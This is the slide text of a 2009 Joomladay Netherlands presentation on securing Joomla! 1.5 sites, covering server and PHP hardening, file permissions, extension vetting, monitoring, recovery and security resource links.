Joomladay Netherlands - Security

3,557 views

Published on

Joomla security presentation given on the Dutch Joomladay

Published in: Technology, Business

Joomladay Netherlands - Security

  1. 1. Joomla! 1.5 Security Joomla!day Presentation Utrecht, Netherlands 12 june 2009
  2. 2. Is Joomla! safe?
  3. 3. Is the World Wide Web Safe?
  4. 4. You know, I don't mean any disrespect, but I had to chuckle by the question "Is Joomla! not safe?" since it reminded me of the movie The Marathon Man when the dentist is pulling Dustin Hoffman's teeth out, asking "Is it safe?" and he's so desperate to get the Dentist to stop that he says Yes or No or What do you want to hear? Is Joomla! safe? Quote taken from: http://forum.joomla.org/viewtopic.php?f=432&t=318351&st=0&sk=t&sd=a
  5. 5.
  6. 6. I would say - anyone who tells a community that a Web site or a out of the box solution is safe is not being responsible. No , it is not "safe" on the Internet.
  7. 7. What is this presentation about?
  8. 8. <ul><li>Getting Started
  9. 9. Hosting and Server Setup
  10. 10. Joomla Setup
  11. 11. Site Administration
  12. 12. Site Recovery </li></ul>Presentation overview
  13. 13. Getting started
  14. 14. Getting started
  15. 15. Getting started
  16. 16. Some basic things before we go into details: <ul><li>Report (possible) hack to JSST http://developer.joomla.org/security/contact-the-team.html
  17. 17. Please don’t report hacks or proof-of-concepts out in the open, also report them to JSST
  18. 18. Stay informed! </li></ul><ul><ul><li>Automatic Email Notification http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews
  19. 19. RSS feed http://feeds.joomla.org/JoomlaSecurityNews </li></ul></ul>Getting started
  20. 20. Hosting and server set up Shared hosting? Or Dedicated hosting?
  21. 21. Hosting and server set up “ register_globals” “ open_basedir”
  22. 22. <ul><li>Configure Apache: </li></ul><ul><ul><li>Secure important areas with .htaccess
  23. 23. Use mod_rewrite and mod_security to block PHP attacks </li></ul></ul><ul><li>Configure MySQL </li></ul><ul><ul><li>Implement user accounts with “need-to-know” principle </li></ul></ul><ul><li>Configure PHP </li></ul><ul><ul><li>Use PHP 5!
  24. 24. Configure your php.ini file properly (most of the times limited with shared hosts) </li></ul></ul>Hosting and server set up
  25. 25. <ul><li>Configure php.ini </li></ul><ul><ul><li>Use “ disable_functions” to disable dangerous PHP functions that are not needed by your site.
  26. 26. “ Use PHP open_basedir ”
  27. 27. Don't use “ PHP safe_mode ” (it gives a false sense of security)
  28. 28. Don't use “ PHP register_globals ”
  29. 29. Don't use “ PHP allow_url_fopen ”. This option enables the URL-aware fopen wrappers that enable accessing URL object like files. </li></ul></ul>
  30. 30. Joomla! setup
  31. 31. <ul><li>Some basic rules to think about: </li></ul><ul><ul><li>Only install official Joomla! versions!
  32. 32. Change the default administrator username
  33. 33. Protect directories and files </li><ul><li>Move crucial files outside public directory http://docs.joomla.org/Security_and_Performance_FAQs#How_do_I_move_confidential_files_outside_of_public_html.3F
  34. 34. Ensure that all configurable paths to writable or uploadable directories
  35. 35. Protect your log directory (moving it out of document root or .htaccess protect it) </li></ul><li>Adjust file and directory permissions </li><ul><li>Set critical directories to 755
  36. 36. Set file permissions to 644 </li></ul><li>Remove unneeded files </li></ul></ul>Joomla! setup
  37. 37. <ul><li>Before you install extensions </li></ul><ul><ul><li>Always backup (even on your test system)
  38. 38. Always test before you install on your life server
  39. 39. Check for extension vulnerabilities
  40. 40. Download from trusted sites
  41. 41. User beware! Check the code quality
  42. 42. Test! Test! Test!
  43. 43. Remove junk files (all that is not needed)
  44. 44. Avoid encrypted code </li></ul></ul>Joomla! setup
  45. 45. Site administration
  46. 46. <ul><li>Use well-formed passwords
  47. 47. Maintain a strong site backup process
  48. 48. Monitor crack attempts (tripwire, SAMHAIN)
  49. 49. Perform manual intrusion detection (manual logfile scan)
  50. 50. Stay current with security patches and upgrades </li></ul>Site administration
  51. 51. <ul><li>Get help the right way
  52. 52. Follow a logical and rigorous recovery process
  53. 53. Reset your administrator password (and all admins/super admins)
  54. 54. Find exploit attempts using the *NIX shell </li></ul>Site recovery
  55. 55. Links
  56. 56. <ul><li>Documentation wiki : http://docs.joomla.org/Category:Security_Checklist
  57. 57. Joomla! Security Strike Team (JSST): http://developer.joomla.org/security.html
  58. 58. Report issues to JSST : http://developer.joomla.org/security/contact-the-team.html </li></ul>Links
  59. 59. Joomla! related <ul><li>www.joomla.org
  60. 60. developer.joomla.org/security.html
  61. 61. www.secunia.org
  62. 62. www.milw0rm.com </li></ul>Sites to put RSS feeds on <ul><li>http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews </li></ul>General <ul><li>www.us-cert.gov
  63. 63. www.frsirt.com </li></ul>Operating systems related <ul><li>www.debian.org/security
  64. 64. www.openbsd.org/security
  65. 65. www.redhat.org/apps/support </li></ul>Sites to monitor when you take security seriously
  66. 66. Questions?

×